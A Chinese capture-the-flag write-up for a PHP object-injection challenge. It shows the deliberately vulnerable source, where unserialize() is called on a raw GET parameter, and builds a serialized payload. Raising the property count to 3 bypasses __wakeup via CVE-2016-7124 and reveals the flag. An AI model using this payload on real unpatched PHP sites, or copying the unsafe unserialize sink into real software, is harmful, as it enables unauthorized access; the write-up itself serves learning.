学一下Web 要不然渗透打不进去我的内网工具没用!
这题提示了 nowakeup,那么思路就是绕过 __wakeup。
因为 __wakeup 会把 passwd 替换成它的 SHA-1 哈希值(是哈希,不是加密),正常反序列化之后 passwd 肯定不可能等于 wllm。
<?php
// Declare the response as UTF-8 HTML; this has to happen before any output is produced.
header('Content-type:text/html;charset=utf-8');
// Turn off all PHP error reporting for this request.
error_reporting(0);
// Print the highlighted source of class.php into the response
// (show_source() is an alias of highlight_file()).
highlight_file('class.php');
/**
 * Challenge class whose magic methods act on whatever state the object carries.
 *
 * Both properties are public and untyped, so any value can be assigned to them,
 * including by a serialized representation of the object.
 */
class HaHaHa
{
    /** @var mixed Set to "user" by the constructor. */
    public $admin;

    /** @var mixed Set to "123456" by the constructor; rewritten by __wakeup(). */
    public $passwd;

    /**
     * Initialises the object with the default, non-privileged values.
     */
    public function __construct()
    {
        $this->admin = 'user';
        $this->passwd = '123456';
    }

    /**
     * Replaces passwd with its SHA-1 hex digest.
     *
     * After this has run, passwd is a 40-character hex string and therefore
     * cannot be equal to the literal compared in __destruct().
     */
    public function __wakeup()
    {
        $digest = sha1($this->passwd);
        $this->passwd = $digest;
    }

    /**
     * Prints the flag when both properties hold the expected literals,
     * otherwise prints the current passwd followed by a fixed message.
     */
    public function __destruct()
    {
        $nameMatches = $this->admin === 'admin';
        $passwordMatches = $this->passwd === 'wllm';

        if (!($nameMatches && $passwordMatches)) {
            echo $this->passwd, 'No wake up';
            return;
        }

        // $flag is not defined in this file; presumably flag.php sets it.
        include 'flag.php';
        echo $flag;
    }
}
// NOTE(review): deliberately vulnerable sink. The raw `p` query parameter is
// read without any validation.
$Letmeseesee = $_GET['p'];
// The requester's string is passed straight to unserialize(), so the requester
// chooses the class and the property values of the object that is built.
// The return value is not stored. Outside a challenge, untrusted input should
// be decoded with json_decode(), or unserialize() should be called with
// ['allowed_classes' => false] so that no class magic methods are reachable.
unserialize($Letmeseesee);
?>
__wakeup 绕过技巧 (CVE-2016-7124):当序列化字符串中声明的对象属性个数大于实际属性个数时,__wakeup 不会执行。这是旧版 PHP 的一个缺陷,已在后续版本中修复;根本的防护是不要对不可信的输入调用 unserialize()。
// Requires the HaHaHa class definition to be loaded.
// Creates an instance, overwrites its two public properties with the literals
// that __destruct() compares against, and prints the serialized form.
$obj = new HaHaHa();
$obj->admin = 'admin';
$obj->passwd = 'wllm';
$serialized = serialize($obj);
echo $serialized;
得到 O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}
其中第一个 6 是类名的长度,第一个 2 是属性个数;将属性个数改成 3,即可跳过 __wakeup。
